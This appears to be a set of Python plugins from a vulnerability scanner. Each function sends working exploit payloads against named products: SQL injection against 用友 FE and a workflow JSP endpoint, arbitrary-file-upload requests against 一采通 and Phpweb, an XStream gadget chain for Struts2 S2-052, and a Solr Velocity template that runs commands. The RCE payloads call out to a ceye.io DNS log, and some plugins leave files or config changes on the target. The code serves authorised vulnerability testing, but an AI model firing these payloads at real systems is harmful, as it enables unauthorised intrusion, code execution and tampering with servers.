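def medusa(Url, RandomAgent, ProxyIp):
    """Run the 用友FE协作办公平台 5.5 SQL-injection checks against ``Url``.

    Two probes are sent, both built from module-level payload strings:

    1. ``payload`` (error/echo based): a hit is recorded when the response
       body contains ``bbbmicrosoft``.
    2. ``payload2`` (time based): a hit is recorded when the round trip takes
       at least ``delay_seconds``. A saturated link or an overloaded host can
       trip this as well, so treat a lone timing hit as a candidate to confirm
       rather than as proof.

    Args:
        Url: target URL; ``UrlProcessing`` splits it into scheme, host, port.
        RandomAgent: value sent as the ``User-Agent`` header.
        ProxyIp: ``host:port`` of an HTTP proxy, or ``None`` to connect directly.

    Returns:
        The concatenated finding strings (``""`` when nothing was found), or
        ``None`` when the time-based probe raised; that error is written to
        ``ClassCongregation.ErrorLog``. A probe-1 failure is logged the same
        way and probe 2 still runs.

    Side effects:
        Assigns the module global ``resp`` (last ``requests.Response``) and,
        on a timing hit, reports it through ``VulnerabilityDetails(...).High()``.
        TLS certificates are not verified (``verify=False``).
    """
    global resp

    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80

    # Smallest server-side delay (seconds) that counts as a time-based hit.
    # The read timeout has to sit well above it: with timeout == threshold a
    # host that sleeps for the full delay raises ReadTimeout before the
    # elapsed time can be measured, so the check could never fire.
    delay_seconds = 6
    timeout_seconds = delay_seconds + 4

    headers = {
        'Accept-Encoding': 'gzip, deflate',
        'Accept': '*/*',
        'User-Agent': RandomAgent,
    }
    # requests only sends a scheme through the proxy when that scheme has an
    # entry, so https targets need one too. None means "no proxy".
    proxies = None
    if ProxyIp is not None:
        proxy_url = "http://" + str(ProxyIp)
        proxies = {"http": proxy_url, "https": proxy_url}

    def log_error():
        # Route plugin failures through the framework's error log.
        plugin = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorLog().Write(url, plugin)

    findings = []
    finding_fmt = "{} 存在用友FE协作办公平台5.5 SQL注入漏洞\r\n漏洞详情:\r\nPayload:{}\r\n"

    # Probe 1: error/echo-based. The explicit port is kept for this request
    # because the plugin has always sent it that way.
    payload_url = scheme + "://" + url + ':' + str(port) + payload
    try:
        resp = requests.get(payload_url,
                            headers=headers,
                            proxies=proxies,
                            timeout=5,
                            verify=False)
        if 'bbbmicrosoft' in resp.text.lower():
            findings.append(finding_fmt.format(url, payload_url))
    except Exception:
        # Best effort: a failed first probe must not cancel the second, but it
        # is recorded instead of being silently dropped.
        log_error()

    # Probe 2: time-based. This request omits the explicit port (host-only
    # URL, default port for the scheme); kept as the plugin originally did.
    payload_url2 = scheme + "://" + url + payload2
    try:
        started = time.monotonic()
        resp = requests.get(payload_url2,
                            headers=headers,
                            proxies=proxies,
                            timeout=timeout_seconds,
                            verify=False)
        if time.monotonic() - started >= delay_seconds:
            findings.append(finding_fmt.format(url, payload_url2))
            # The whole list is handed to VulnerabilityInfo here (not a single
            # string as other plugins do); preserved as the framework expects.
            _t = VulnerabilityInfo(findings)
            ClassCongregation.VulnerabilityDetails(_t.info).High()
        return ''.join(findings)
    except Exception:
        log_error()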
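def medusa(Url, RandomAgent, ProxyIp):
    """Run two SQL-injection probes against ``Url`` and return the finding info.

    Probe 1 appends the module-level ``payload`` to every candidate path in
    the module-level ``urls`` and treats an HTTP 500 whose body contains
    ``gqxmicrosoft`` as a hit. Probe 2 fetches ``/include/get_user.aspx``
    and treats a body containing ``button_normal`` as a hit. The first hit
    is rated High through ``VulnerabilityDetails`` and returned immediately.

    Args:
        Url: target URL; ``UrlProcessing`` splits it into scheme, host, port.
        RandomAgent: value sent as the ``User-Agent`` header.
        ProxyIp: ``host:port`` of an HTTP proxy, or ``None`` to connect directly.

    Returns:
        ``VulnerabilityInfo(<finding>).info`` on a hit, otherwise
        ``VulnerabilityInfo([]).info`` (an empty finding list).

    Side effects:
        Assigns the module global ``resp``. Request errors are logged with
        ``logging.warning`` and the remaining probes still run; a timeout on
        one candidate path no longer skips the paths after it. TLS
        certificates are not verified (``verify=False``).
    """
    global resp

    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    # NOTE(review): neither probe URL below includes ``port``; both rely on
    # the scheme's default port. Kept as the plugin originally behaved.

    headers = {
        'Accept-Encoding': 'gzip, deflate',
        'Accept': '*/*',
        'User-Agent': RandomAgent,
    }
    # requests only sends a scheme through the proxy when that scheme has an
    # entry, so https targets need one too. None means "no proxy".
    proxies = None
    if ProxyIp is not None:
        proxy_url = "http://" + str(ProxyIp)
        proxies = {"http": proxy_url, "https": proxy_url}

    def warn():
        # Framework-style warning: the target, then the plugin parameter.
        logging.warning(Url)
        logging.warning(VulnerabilityInfo('').info.get('parameter'))

    def report(message):
        # Wrap one finding, rate it High, return the framework's info dict.
        _t = VulnerabilityInfo(message)
        ClassCongregation.VulnerabilityDetails(_t.info).High()
        return _t.info

    finding_fmt = "{} \r\n漏洞详情:\r\nPayload:{}\r\n"

    # Probe 1: one request per candidate path, each guarded on its own so a
    # single timeout does not abort the rest of the list.
    for turl in urls:
        payload_url = scheme + "://" + url + turl + payload
        try:
            resp = requests.get(payload_url,
                                headers=headers,
                                proxies=proxies,
                                timeout=5,
                                verify=False)
            if resp.status_code == 500 and 'gqxmicrosoft' in resp.text.lower():
                return report(finding_fmt.format(url, payload_url))
        except Exception:
            warn()

    # Probe 2: a fixed page whose presence is the fingerprint.
    payload_url = scheme + "://" + url + "/include/get_user.aspx"
    try:
        resp = requests.get(payload_url,
                            headers=headers,
                            proxies=proxies,
                            timeout=5,
                            verify=False)
        if 'button_normal' in resp.text.lower():
            return report(finding_fmt.format(url, payload_url))
    except Exception:
        warn()

    return VulnerabilityInfo([]).info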
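def medusa(Url, RandomAgent, ProxyIp):
    """Check ``Url`` for the 一采通 e-procurement arbitrary-file-upload issue.

    Step 1 POSTs a multipart body carrying a ``.cer`` file with a random
    marker to ``/library/editornew/Editor/img_save.asp``. If the response
    echoes ``getimg('<digits>.cer')``, step 2 fetches that name from
    ``/library/editornew/Editor/NewImage/`` and looks for the marker.

    Args:
        Url: target URL; ``UrlProcessing`` splits it into scheme, host, port.
        RandomAgent: value sent as the ``User-Agent`` header.
        ProxyIp: ``host:port`` of an HTTP proxy, or ``None`` to connect directly.

    Returns:
        ``str(VulnerabilityInfo(<finding>).info)`` on a hit, else ``None``.

    Side effects:
        A marker file is left on the target; nothing removes it. The module
        globals ``resp`` and ``resp2`` are assigned, a hit is rated High via
        ``VulnerabilityDetails`` and errors go to ``ClassCongregation.ErrorLog``.
        TLS certificates are not verified (``verify=False``).
    """
    import secrets

    global resp, resp2

    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    base = scheme + "://" + url + ":" + str(port)

    # Random per run so a file left behind by an earlier scan cannot produce
    # a false positive. token_hex is lowercase, so it survives the .lower()
    # comparison below.
    marker = secrets.token_hex(8)

    # The body must be built at column 0: a multipart parser only recognises
    # a boundary at the start of a line, so an indented body has no parts.
    # It is sent as UTF-8 bytes because http.client Latin-1-encodes a str
    # body, which raises on ``提交`` before anything reaches the wire.
    data = '''
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_src"; filename="123.cer"
Content-Type: application/x-x509-ca-cert

{}
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="Submit"

提交
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_alt"


------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_align"

baseline
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_border"


------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="newid"

45
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_hspace"


------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_vspace"


------WebKitFormBoundaryNjZKAB66SVyL1INA--
'''.format(marker).encode('utf-8')

    # NOTE(review): the body is multipart but the Content-Type says
    # urlencoded. Kept as the plugin always sent it; presumably the target
    # reads the raw request body - confirm before changing it.
    headers = {
        'User-Agent': RandomAgent,
        'Content-Type': 'application/x-www-form-urlencoded',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    }
    # Both schemes need an entry or https targets bypass the proxy.
    proxies = None
    if ProxyIp is not None:
        proxy_url = "http://" + str(ProxyIp)
        proxies = {"http": proxy_url, "https": proxy_url}

    try:
        with requests.Session() as s:
            resp = s.post(base + "/library/editornew/Editor/img_save.asp",
                          data=data,
                          headers=headers,
                          proxies=proxies,
                          timeout=6,
                          verify=False)
            # The dot in ".cer" is escaped; the file name is all digits.
            match = re.search(r"getimg\('(\d+\.cer)'\)", resp.text)
            if not match:
                return None
            payload_url2 = base + "/library/editornew/Editor/NewImage/" + match.group(1)
            resp2 = s.get(payload_url2,
                          headers=headers,
                          proxies=proxies,
                          timeout=6,
                          verify=False)
            if resp2.status_code == 200 and marker in resp2.text.lower():
                Medusa = "{}存在一采通电子采购系统任意文件上传漏洞\r\n 验证数据:\r\nshell地址:{}\r\n内容:{}\r\n".format(
                    url, payload_url2, resp2.text)
                _t = VulnerabilityInfo(Medusa)
                ClassCongregation.VulnerabilityDetails(_t.info).High()
                return str(_t.info)
    except Exception:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorLog().Write(url, _)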
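def medusa(Url, RandomAgent, ProxyIp):
    """Check ``Url`` for the Struts2 S2-052 REST-plugin deserialisation issue via DNS log.

    POSTs an XStream gadget chain as ``application/xml`` to ``/orders/3/edit``;
    a vulnerable host ends up running ``ping <host>.S2052.<identifier>.ceye.io``.
    After a 5 s wait the ceye.io DNS records are queried and a record that
    contains ``<host>.S2052`` is taken as confirmation.

    The ceye.io credentials are read from the environment instead of being
    embedded in the source: ``CEYE_TOKEN`` (API token) and ``CEYE_IDENTIFIER``
    (the per-account subdomain label). When either is unset the plugin
    records an error and returns without touching the target.

    Args:
        Url: target URL; ``UrlProcessing`` splits it into scheme, host, port.
        RandomAgent: value sent as the ``User-Agent`` header.
        ProxyIp: accepted for interface compatibility only; this plugin has
            never routed its requests through a proxy (NOTE(review): wire it
            up if proxying is required).

    Returns:
        ``None``. A hit is rated High via ``VulnerabilityDetails`` and written
        to the result file with ``ClassCongregation.WriteFile``; exceptions
        are logged through ``ClassCongregation.ErrorLog``.

    Caveats:
        Out-of-band check: it only works when the target can resolve the
        ceye.io name and the scanner can reach the ceye.io API. The DNS label
        is the raw target host, so a long hostname can exceed DNS length
        limits and never resolve (false negative). TLS certificates are not
        verified (``verify=False``).
    """
    import os

    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80

    token = os.environ.get("CEYE_TOKEN")
    identifier = os.environ.get("CEYE_IDENTIFIER")
    if not token or not identifier:
        # Missing DNS-log credentials: nothing can be confirmed, so do not
        # fire the payload at the target at all.
        ClassCongregation.ErrorLog().Write(url, VulnerabilityInfo('').info.get('algroup'))
        return

    payload_url = scheme + "://" + url + ':' + str(port) + '/orders/3/edit'
    host = url + ':' + str(port)
    payload = '''
    <map>
      <entry>
        <jdk.nashorn.internal.objects.NativeString>
          <flags>0</flags>
          <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
            <dataHandler>
              <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
                <is class="javax.crypto.CipherInputStream">
                  <cipher class="javax.crypto.NullCipher">
                    <initialized>false</initialized>
                    <opmode>0</opmode>
                    <serviceIterator class="javax.imageio.spi.FilterIterator">
                      <iter class="javax.imageio.spi.FilterIterator">
                        <iter class="java.util.Collections$EmptyIterator"/>
                        <next class="java.lang.ProcessBuilder">
                          <command>
                            <string>ping</string>
                            <string>{}.S2052.{}.ceye.io</string>
                          </command>
                          <redirectErrorStream>false</redirectErrorStream>
                        </next>
                      </iter>
                      <filter class="javax.imageio.ImageIO$ContainsFilter">
                        <method>
                          <class>java.lang.ProcessBuilder</class>
                          <name>start</name>
                          <parameter-types/>
                        </method>
                        <name>foo</name>
                      </filter>
                      <next class="string">foo</next>
                    </serviceIterator>
                    <lock/>
                  </cipher>
                  <input class="java.lang.ProcessBuilder$NullInputStream"/>
                  <ibuffer></ibuffer>
                  <done>false</done>
                  <ostart>0</ostart>
                  <ofinish>0</ofinish>
                  <closed>false</closed>
                </is>
                <consumed>false</consumed>
              </dataSource>
              <transferFlavors/>
            </dataHandler>
            <dataLen>0</dataLen>
          </value>
        </jdk.nashorn.internal.objects.NativeString>
        <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
      </entry>
      <entry>
        <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
        <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
      </entry>
    </map>
    '''.format(url, identifier)
    headers = {
        'Host': host,
        'Accept': '*/*',
        'Accept-Language': 'en',
        'User-Agent': RandomAgent,
        'Connection': 'close',
        'Content-Type': 'application/xml',
    }

    try:
        requests.post(payload_url,
                      data=payload,
                      headers=headers,
                      timeout=5,
                      verify=False)
        ceyeurl = 'http://api.ceye.io/v1/records?token={}&type=dns&filter='.format(token)
        # Give the target time to deserialise, spawn ping and resolve the name.
        time.sleep(5)
        # Compare against .text: ``str in Response`` iterates the body as
        # byte chunks and can never equal a str, so that test was always False.
        records = requests.get(ceyeurl, timeout=3).text
        flag = "{}.S2052".format(url)
        if flag in records:
            Medusa = "{}存在Struts2远程代码执行漏洞\r\n漏洞详情:\r\n影响版本:Struts2_1_2-Struts2_3_33,Struts2_5-Struts2_5_12\r\nPayload:{}\r\nPost:{}\r\n".format(
                url, payload_url, payload)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(_t.info).High()
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorLog().Write(url, _)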
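def medusa(**kwargs) -> None:
    """Check a Solr instance for Velocity-template remote code execution via DNS log.

    Steps: list cores through ``/solr/admin/cores`` and take the last name
    under ``status``; POST a config-API update that enables the Velocity
    response writer with the params resource loader; then request
    ``/solr/<core>/select`` with a template that runs ``ping <dnslog host>``.
    A lookup seen by ``ClassCongregation.Dnslog`` is taken as confirmation.

    Keyword Args:
        Url: base URL of the target (scheme and host, no trailing slash).
        Headers: request headers. They are copied before use: the previous
            version mutated the caller's dict in place and, because both
            header variables aliased that same dict, the GET was sent with
            ``Content-Type: application/json`` as well.
        Proxies: ``proxies`` mapping handed straight to ``requests``.

    Returns:
        None. A hit is written via ``VulnerabilityDetails(...).Write()`` and
        ``WriteFile().result``; errors go to ``ErrorHandling`` and ``ErrorLog``.

    Caveats:
        The config-API POST is a persistent change on the target (it enables
        ``params.resource.loader.enabled``); nothing here reverts it. TLS
        certificates are not verified (``verify=False``).
    """
    url = kwargs.get("Url")
    Headers = kwargs.get("Headers")
    proxies = kwargs.get("Proxies")
    try:
        base_headers = dict(Headers or {})
        form_headers = dict(base_headers)
        form_headers['Content-Type'] = 'application/x-www-form-urlencoded'
        json_headers = dict(base_headers)
        json_headers['Content-Type'] = 'application/json'

        step1 = requests.get(url + '/solr/admin/cores',
                             timeout=6,
                             proxies=proxies,
                             headers=form_headers,
                             verify=False).text
        data = json.loads(step1)
        if 'status' not in data:
            return

        # Last core listed wins; there is no preference logic.
        name = ''
        for x in data['status']:
            name = x

        DL = ClassCongregation.Dnslog()
        dns_host = DL.dns_host()
        config_url = url + "/solr/" + name + "/config"
        select_url = url + '/solr/' + name + '/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27ping {}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end'.format(
            dns_host)

        payload_data = """{
              "update-queryresponsewriter": {
                "startup": "lazy",
                "name": "velocity",
                "class": "solr.VelocityResponseWriter",
                "template.base.dir": "",
                "solr.resource.loader.enabled": "true",
                "params.resource.loader.enabled": "true"
              }
            }"""

        requests.post(config_url,
                      data=payload_data,
                      headers=json_headers,
                      proxies=proxies,
                      timeout=6,
                      verify=False)
        resp2 = requests.get(select_url,
                             headers=form_headers,
                             timeout=6,
                             proxies=proxies,
                             verify=False)
        con2 = resp2.text
        if DL.result():
            # Both the echoed output and the DNS-log host are reported; the
            # previous format string had one placeholder too few and labelled
            # the response body as the DNS log.
            Medusa = "{} SolrVelocity模板远程代码执行漏洞\r\n验证数据:\r\n回显内容:{}\r\nDNSlog:{}\r\n".format(
                url, con2, dns_host)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(_t.info, resp2, **kwargs).Write()
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        ClassCongregation.ErrorLog().Write(
            "Plugin Name:" + _ + " || Target Url:" + url, e)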
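def medusa(**kwargs) -> None:
    """Check the target for the 一采通 e-procurement arbitrary-file-upload issue.

    Step 1 POSTs a multipart body carrying a ``.cer`` file whose content is a
    20-character random string to ``/library/editornew/Editor/img_save.asp``.
    If the response echoes ``getimg('<digits>.cer')``, step 2 fetches that
    name from ``/library/editornew/Editor/NewImage/`` and looks for the
    random string.

    Keyword Args:
        Url: base URL of the target (scheme and host, no trailing slash).
        Headers: request headers. Copied before use so the caller's dict is
            not mutated (the previous version wrote ``Content-Type`` and
            ``Accept`` into the shared dict, leaking into later plugins).
        Proxies: ``proxies`` mapping handed straight to ``requests``.

    Returns:
        None. A hit is written via ``VulnerabilityDetails(...).Write()`` and
        ``WriteFile().result``; errors go to ``ErrorHandling`` and ``ErrorLog``.

    Side effects:
        A marker file is left on the target; nothing removes it. TLS
        certificates are not verified (``verify=False``).
    """
    url = kwargs.get("Url")
    Headers = kwargs.get("Headers")
    proxies = kwargs.get("Proxies")
    try:
        RD = ClassCongregation.randoms().result(20)
        payload_url = url + "/library/editornew/Editor/img_save.asp"
        # Boundary lines at column 0 (a multipart parser only recognises a
        # boundary at line start); encoded as UTF-8 because http.client would
        # otherwise try to Latin-1 encode ``提交`` and raise.
        data = '''
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_src"; filename="123.cer"
Content-Type: application/x-x509-ca-cert

{}
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="Submit"

提交
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_alt"


------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_align"

baseline
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_border"


------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="newid"

45
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_hspace"


------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_vspace"


------WebKitFormBoundaryNjZKAB66SVyL1INA--
'''.format(RD).encode('utf-8')

        # NOTE(review): the body is multipart but the Content-Type says
        # urlencoded. Kept as the plugin always sent it; presumably the target
        # reads the raw request body - confirm before changing it.
        headers = dict(Headers or {})
        headers['Content-Type'] = 'application/x-www-form-urlencoded'
        headers['Accept'] = 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'

        resp = requests.post(payload_url,
                             data=data,
                             headers=headers,
                             proxies=proxies,
                             timeout=6,
                             verify=False)
        # The dot in ".cer" is escaped; the stored file name is all digits.
        match = re.search(r"getimg\('(\d+\.cer)'\)", resp.text)
        if not match:
            return
        payload_url2 = url + "/library/editornew/Editor/NewImage/" + match.group(1)
        resp2 = requests.get(payload_url2,
                             headers=headers,
                             timeout=6,
                             proxies=proxies,
                             verify=False)
        con2 = resp2.text
        # Case-fold both sides: randoms().result() may contain upper-case
        # letters (TODO confirm), in which case comparing the raw marker
        # against a lower-cased body can never match.
        if resp2.status_code == 200 and RD.lower() in con2.lower():
            Medusa = "{}存在一采通电子采购系统任意文件上传漏洞\r\n 验证数据:\r\nshell地址:{}\r\n内容:{}\r\n".format(
                url, payload_url2, con2)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(_t.info, resp2, **kwargs).Write()
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        ClassCongregation.ErrorLog().Write(
            "Plugin Name:" + _ + " || Target Url:" + url, e)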
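def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Check ``Url`` for the Phpweb front-end arbitrary-file-upload issue.

    Step 1 POSTs ``act=appcode`` to ``/base/post.php`` and reads the ``k``
    value from a reply that starts with ``k=<value>&``. Step 2 uploads
    ``<rand>.txt`` (content ``<rand>``) through ``/base/appfile.php`` with
    ``m = md5(k + "1")`` - this reproduces the target's own upload token and
    is not a security use of MD5 on our side. Step 3 fetches
    ``/effect/source/bg/<rand>.txt`` and looks for ``<rand>``.

    Args:
        Url: target URL; ``UrlProcessing`` splits it into scheme, host, port.
        RandomAgent: value sent as the ``User-Agent`` header.
        proxies: proxy setting, normalised by ``ClassCongregation.Proxies``.
        **kwargs: forwarded to ``VulnerabilityDetails`` on a hit.

    Returns:
        None. A hit is written via ``VulnerabilityDetails(...).Write()`` and
        ``WriteFile().result``; errors go to ``ErrorHandling`` and ``ErrorLog``.

    Side effects:
        The uploaded ``<rand>.txt`` is left on the target; nothing removes it.
        TLS certificates are not verified (``verify=False``).
    """
    proxies = ClassCongregation.Proxies().result(proxies)

    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    base = scheme + '://' + url + ':' + str(port)

    try:
        ran = ranstr(10)
        post_url = base + "/base/post.php"
        upload_url = base + "/base/appfile.php"
        verify_url = base + "/effect/source/bg/{}.txt".format(ran)

        headers = {
            'Accept-Encoding': 'gzip, deflate',
            'Accept': '*/*',
            'Accept-Language': 'en',
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
        }
        upload_headers = dict(headers)
        upload_headers['Content-Type'] = 'multipart/form-data; boundary=----WebKitFormBoundary0ZoOKoVwkSlGFfVE'

        resp = requests.post(post_url,
                             data="act=appcode",
                             proxies=proxies,
                             headers=headers,
                             timeout=5,
                             verify=False)
        match = re.match('k=(.*?)&', resp.text, re.M | re.I)
        if match is None:
            # No token in the reply: the endpoint is absent or answers
            # differently, which is "not vulnerable", not a plugin error
            # (previously an AttributeError landed in the error log here).
            return
        k = match.group(1)
        md5_en = hashlib.md5((k + "1").encode("utf-8")).hexdigest()

        upload_body = '''------WebKitFormBoundary0ZoOKoVwkSlGFfVE
Content-Disposition: form-data; name="file"; filename="{}.txt"
Content-Type: application/octet-stream

{}
------WebKitFormBoundary0ZoOKoVwkSlGFfVE
Content-Disposition: form-data; name="t"

1
------WebKitFormBoundary0ZoOKoVwkSlGFfVE
Content-Disposition: form-data; name="m"

{}
------WebKitFormBoundary0ZoOKoVwkSlGFfVE
Content-Disposition: form-data; name="act"

upload
------WebKitFormBoundary0ZoOKoVwkSlGFfVE
Content-Disposition: form-data; name="r_size"

10
------WebKitFormBoundary0ZoOKoVwkSlGFfVE
Content-Disposition: form-data; name="submit"

getshell
------WebKitFormBoundary0ZoOKoVwkSlGFfVE--'''.format(ran, ran, md5_en)
        requests.post(upload_url,
                      data=upload_body,
                      proxies=proxies,
                      headers=upload_headers,
                      timeout=5,
                      verify=False)
        resp3 = requests.get(verify_url,
                             headers=headers,
                             proxies=proxies,
                             timeout=5,
                             verify=False)
        con3 = resp3.text
        if resp3.status_code == 200 and ran in con3:
            Medusa = "{} 存在Phpweb前台任意文件上传漏洞\r\n漏洞地址:\r\n上传位置:\r\n{}\r\n上传数据包:\r\n{}\r\nwebshell位置:\r\n{}\r\n漏洞详情:\r\n{}".format(
                url, upload_url, upload_body, verify_url, con3)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(_t.info, url, **kwargs).Write()
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        ClassCongregation.ErrorLog().Write(url, _)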


#medusa("http://192.168.0.142","Mozilla/5.0(compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)")
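def medusa(Url, RandomAgent, ProxyIp):
    """Check ``Url`` for SQL injection in ``/mobile/browser/WorkflowCenterTreeData.jsp``.

    POSTs a ``formids`` value made of ``11111111111)))``, 360 ``\\n\\r`` pairs
    (presumably to get past a length or keyword filter - TODO confirm) and an
    Oracle ``union select NULL,instance_name from v$instance``. A 200 reply
    whose body contains the ``"draggable":``, ``"checked":``, ``"id":`` and
    ``"text":`` JSON keys is taken as a hit.

    Args:
        Url: target URL; ``UrlProcessing`` splits it into scheme, host, port.
        RandomAgent: value sent as the ``User-Agent`` header.
        ProxyIp: ``host:port`` of an HTTP proxy, or ``None`` to connect directly.

    Returns:
        ``VulnerabilityInfo(<finding>).info`` on a hit, otherwise ``None``
        (also ``None`` after an exception, which is logged with
        ``logging.warning``).

    Side effects:
        Assigns the module global ``resp``; a hit is rated High through
        ``VulnerabilityDetails``. TLS certificates are not verified.
    """
    global resp

    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    # NOTE(review): ``port`` is not used in the probe URL; kept as originally.

    injected = ('11111111111)))' + '\x0a\x0d' * 360 +
                'union select NULL,instance_name from v$instance order by (((1')
    payload_url = scheme + "://" + url + "/mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333"
    headers = {
        'User-Agent': RandomAgent,
        'Content-Type': 'application/x-www-form-urlencoded',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    }
    # requests only sends a scheme through the proxy when that scheme has an
    # entry, so https targets need one too. None means "no proxy".
    proxies = None
    if ProxyIp is not None:
        proxy_url = "http://" + str(ProxyIp)
        proxies = {"http": proxy_url, "https": proxy_url}

    try:
        with requests.Session() as s:
            resp = s.post(payload_url,
                          data={'formids': injected},
                          headers=headers,
                          timeout=6,
                          proxies=proxies,
                          verify=False)
        body = resp.text.lower()
        required_keys = ('"draggable":', '"checked":', '"id":', '"text":')
        if resp.status_code == 200 and all(key in body for key in required_keys):
            Medusa = "{} 验证数据:\r\nUrl:{}\r\nPayload:{}\r\n".format(url, payload_url, injected)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(_t.info).High()
            return _t.info
    except Exception:
        logging.warning(Url)
        logging.warning(VulnerabilityInfo('').info.get('parameter'))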
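def medusa(Url, RandomAgent, UnixTimestamp):
    """Check a Solr instance for Velocity-template remote code execution via ceye.io DNS log.

    Steps: list cores through ``/solr/admin/cores`` and take the last name
    under ``status``; POST a config-API update that enables the Velocity
    response writer with the params resource loader; then request
    ``/solr/<core>/select`` with a template that runs
    ``ping <rand>.<identifier>.ceye.io``. After a 5 s wait the ceye.io DNS
    records are fetched and a record containing ``<rand>`` is the hit.

    The ceye.io credentials are read from the environment instead of being
    embedded in the source: ``CEYE_TOKEN`` (API token) and ``CEYE_IDENTIFIER``
    (the per-account subdomain label). When either is unset the plugin
    records an error and returns without touching the target.

    Args:
        Url: target URL; ``UrlProcessing`` splits it into scheme, host, port.
        RandomAgent: value sent as the ``User-Agent`` header.
        UnixTimestamp: forwarded to ``VulnerabilityDetails`` on a hit.

    Returns:
        None. A hit is written via ``VulnerabilityDetails(...).Write()`` and
        ``WriteFile().result``; exceptions go to ``ClassCongregation.ErrorLog``.

    Caveats:
        The config-API POST is a persistent change on the target (it enables
        ``params.resource.loader.enabled``); nothing here reverts it. The
        check is out-of-band: the target must resolve the ceye.io name and
        the scanner must reach the ceye.io API. TLS certificates are not
        verified (``verify=False``).
    """
    import os

    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80

    token = os.environ.get("CEYE_TOKEN")
    identifier = os.environ.get("CEYE_IDENTIFIER")
    if not token or not identifier:
        # Missing DNS-log credentials: nothing can be confirmed, so do not
        # change the target's config at all.
        ClassCongregation.ErrorLog().Write(url, VulnerabilityInfo('').info.get('algroup'))
        return

    base = scheme + "://" + url + ":" + str(port)
    headers = {
        'User-Agent': RandomAgent,
        'Content-Type': 'application/x-www-form-urlencoded',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    }
    try:
        step1 = requests.get(base + '/solr/admin/cores',
                             timeout=6,
                             headers=headers,
                             verify=False).text
        data = json.loads(step1)
        if 'status' not in data:
            return

        # Last core listed wins; there is no preference logic.
        name = ''
        for x in data['status']:
            name = x

        ran = ranstr(10)
        config_url = base + "/solr/" + name + "/config"
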